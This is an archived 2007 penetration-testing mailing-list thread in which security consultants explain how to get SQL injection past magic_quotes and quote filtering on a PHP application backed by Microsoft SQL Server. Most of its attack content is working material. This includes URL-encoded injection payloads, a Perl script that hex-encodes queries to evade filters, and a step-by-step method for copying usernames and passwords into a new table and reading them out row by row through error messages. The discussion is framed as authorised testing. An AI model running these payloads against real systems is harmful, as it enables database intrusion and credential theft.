RE: SQL Injection- Bypassing magic_quotes

From: Gary Oleary-Steele (garyo@sec-1.com)
Date: Fri Oct 12 2007 - 04:53:29 EDT

Danux.

Ok, bypassing single quotes in your case should not be a problem. You
can encode strings in Microsoft SQL in a number of ways.

It really depends at this point what your end goal is. Just dealing with
WHERE clause bit:

As far as I can see your only encoding ' as %27. If that's all you have
to do to get around ' characters then I can modify my tool if it doesn't
do it already with 1 line of code (if this is the case then you're
dealing with a very very basic and broken filter, prob not magic
quotes).

$query = s/'/%27/g;

But if I've missed the point because I haven't read the thread (sorry im
stacked out) then you can also encode strings in this format;

[Normal Version]

Select username from users WHERE username ='hello';

[Encoded version]

Select username from users WHERE username = char(0x68) + char(0x65) +
char(0x6c) + char(0x6c) + char(0x6f) + char(0x31)

(remember when submitting this to the webserver to encode + as %2b)

Taking that one stage further, if you want to encode the entire SQL
query to remove quotes you could use this short perl script;

# Script to bypass php magic quotes
print "Enter SQL query to encode:";
$teststr=<STDIN>;chomp $teststr;

$hardcoded_sql =

        'declare @q varchar(8000) '.
        'select @q=0x*** '.
        'exec(@q)';

        $prepared = encode_sql($teststr);
        $hardcoded_sql =~s/\*\*\*/$prepared/g;

print "\n[*]-Encoded SQL:\n\n";
print $hardcoded_sql ."\n";

sub encode_sql{ #Sub to encode SQL

        @subvar=@_;
        my $sqlstr =$subvar[0];

        @ASCII = unpack("C*", $sqlstr);
        foreach $line (@ASCII) {

                $encoded = sprintf('%lx',$line);
                $encoded_command .= $encoded;
        
                        }
return $encoded_command;

}

Personally I tackle these problems in a number of ways. However, if you
want to take the entire table then this is one idea.

A problem you often come across is indexing a table, i.e. finding a
value you can increment to cycle through the values in the table. In a
recent pen test I had a number of issues with data types so I decided to
create my own table with an identity column. The identity column just
creates a sequential int value for each row in the table.

For example, lets say I have a table called users. I want to extract all
the values from the username and password columns. The first thing I
would do is create my own table to store the results, my table has an
extra identity column. I then use this to identify each row.

[Step 1] Create your table:

'; create table Danux(username varchar(50),password varchar(50), id int
identity(1,1))--

[Step 2] insert the data into your table;

'; insert into Danux select username,password from users--

[Step 3] extract the data out of you own table based on the id column:

' or 1 in (select username from Danux where id=1);--

' or 1 in (select username from Danux where id=2);--

' or 1 in (select username from Danux where id=3);--

Note: if you want both values do

' or 1 in (select username%2b%3a%2bpassword from Danux where id=1);--

(url encoded of course)

If you see the usernames or whatever in the error messages then your
away...

Sorry I've had no time to read the complete thread. Let me know how you
get on.

Thanks
Gary Oleary-Steele
Sec-1 Ltd

p.s. if you don't have permission to create a table try create a temp
table by prefixing ## to you table name.

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of Danux
Sent: 11 October 2007 18:32
To: Gary Oleary-Steele; pen-test@securityfocus.com
Subject: Re: SQL Injection- Bypassing magic_quotes

Excellent Gary, the SQL Version was printed,

Because i was trying to execute:
' union select @@version,1,1,1-- (url encoded obviously).

But without success..!!

Well, let me check your excellent tool and thanks for that, but i
think the problem and issue of the thread is about single quotes so,
if i try to use the WHERE CLAUSE it will be filtered by the PHP app.

On 10/11/07, Gary Oleary-Steele <garyo@sec-1.com> wrote:
> Sorry, I haven't read the thread. However If you want to extract data
> from a table I use the following syntax.
>
> %27or%201%20in%20(SQL HERE)--
>
> Note: I actually use more complex syntax to get round some data type
> issues.
>
> Don't terminate the query (i.e. don't use semi colons) and you most
> probably wont be able to select more than one result at a time. You
> could try my script to do it for you;
>
> http://www.sec-1labs.co.uk/tools/sasi.zip
>
> Or try something like bobcat or one of the other SQL injection tools
out
> there.
>
> To see if its going to work, try this
>
> http://www.site.com/mod.php?id=1%27%20or%201%20in%20(@@Version)--
>
> If that displays the SQL server version within the error then you
should
> be away.
>
> But your going to need to select each row and column at a time. For
> example if you were going for a table called users and that table had
a
> username and password column. You could do;
>
>
http://www.site.com/mod.php?id=1%27%20or%201%20in%20(select%20top%201%20
> username%2b%27%20%27%2bpassword%20from%20users)--
>
> Then you would need to use are where clause to move down the table.
>
> Sorry if I've missed something, I haven't read the thread (in a rush)
>
> Thanks
> Gary
>
> -----Original Message-----
> From: listbounce@securityfocus.com
[mailto:listbounce@securityfocus.com]
> On Behalf Of Danux
> Sent: 11 October 2007 02:00
> To: pen-test@securityfocus.com
> Subject: Re: SQL Injection- Bypassing magic_quotes
>
> Good Leo, but sadly i have already taken those steps, the backend is a
> SQL Server 2005 so xp_cmdshell and others are disabled. I only want
> to print a confidential table in order to show up that its important
> to fix it.
>
> I think, the MSSQL connection handler is executed by the first mod.php
> query so when trying to execute the second one it says the handlers is
> already used, so ... i need a way to execute a second query through
> the first one... with union or something like that or as Geoff said, a
> way to stop executing the first query(mod.php) so that the connection
> handler is not used and can execute the second one of mine (sql
> injection).
>
> What you think?
>
> On 10/10/07, Walsh, Leo <Leo_Walsh@jeffersonwells.com> wrote:
> > I would try a couple of things, if you haven't already.
> >
> > 1) If you aren't actually interested in the results that are
obtained
> > from the query performed by mod.php then skip it. Your 1=1 selection
> > criteria might be eating up too much time. From the looks of your
> query
> > string it seems that can you bypass whatever filtering they are
doing
> > without using 1=1.
> >
> > 2) Try selecting something much smaller than the entire messages
> table.
> > This is a table that might be quite large. Try selecting a single
row
> or
> > message where date > somedate (which you may have to convert to a
> binary
> > value, by the way. If you know another table name then try that.
> >
> > 3) Try using a SQL Injection tool to gain sa access. Depending on
the
> > purpose of your investigation gaining sa should be enough to
> demonstrate
> > a severe vulnerability that should be mitigated immediately.
> >
> >
> > -Leo Walsh, GSNA
> > Jefferson Wells International
> > 816-627-4222 (office)
> > 913-484-8051 (cell)
> >
> > -----Original Message-----
> > From: listbounce@securityfocus.com
> [mailto:listbounce@securityfocus.com]
> > On Behalf Of Danux
> > Sent: Tuesday, October 09, 2007 7:25 PM
> > To: pen-test@securityfocus.com
> > Subject: Re: SQL Injection- Bypassing magic_quotes
> >
> > Hi, well, after taking some examples from you (thanks in advance), i
> am
> > able to bypass single quotes son i can inject something simple as:
> >
> > http://www.site.com/mod.php?id=1%27%20or%201=1--
> >
> > But now, when trying to print a full table.... with the following
> > injection...:
> >
> >
> >
>
http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20mes
> > sages;--
> >
> > there is a Warning saying that the Connecction is busy:
> >
> >
> > Warning: odbc_exec() [function.odbc-exec]: SQL error:
[Microsoft][ODBC
> > SQL Server Driver]Connection is busy with results for another hstmt,
> SQL
> > state S1000 in SQLExecDirect in .........mod.php
> >
> > So, i think i need a way to execute the second query (mine) before
the
> > one that mod.php executes by itself (mod.php?id=1)
> >
> > What you think?
> >
> >
>
------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution FREE today!
> >
> > http://www.cenzic.com/downloads
> >
>
------------------------------------------------------------------------
> >
> >
> >
> > ******* Internet Email Confidentiality ******* The information
> > contained in this message may be privileged and confidential and
> > protected from disclosure. If the reader of this message is not the
> > intended recipient, or an employee or agent responsible for
> > delivering this message to the intended recipient, you are hereby
> > notified that it is strictly prohibited (a) to disseminate,
> > distribute or copy this communication or any of the information
> > contained in it, or (b) to take any action based on the information
> > in it. If you have received this communication in error, please
> > notify us immediately by replying to the message and deleting it
> > from your computer.
> >
>
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>
>
------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
>
------------------------------------------------------------------------
>
>
>
> Sec-1 specialises in the provision of network security solutions.
> For more information on products and services we offer visit
> www.sec-1.com
> or call
> 0113 257 8955.
> 

-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
Sec-1 specialises in the provision of network security solutions. 
For more information on products and services we offer visit 
www.sec-1.com 
or call
0113 257 8955.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT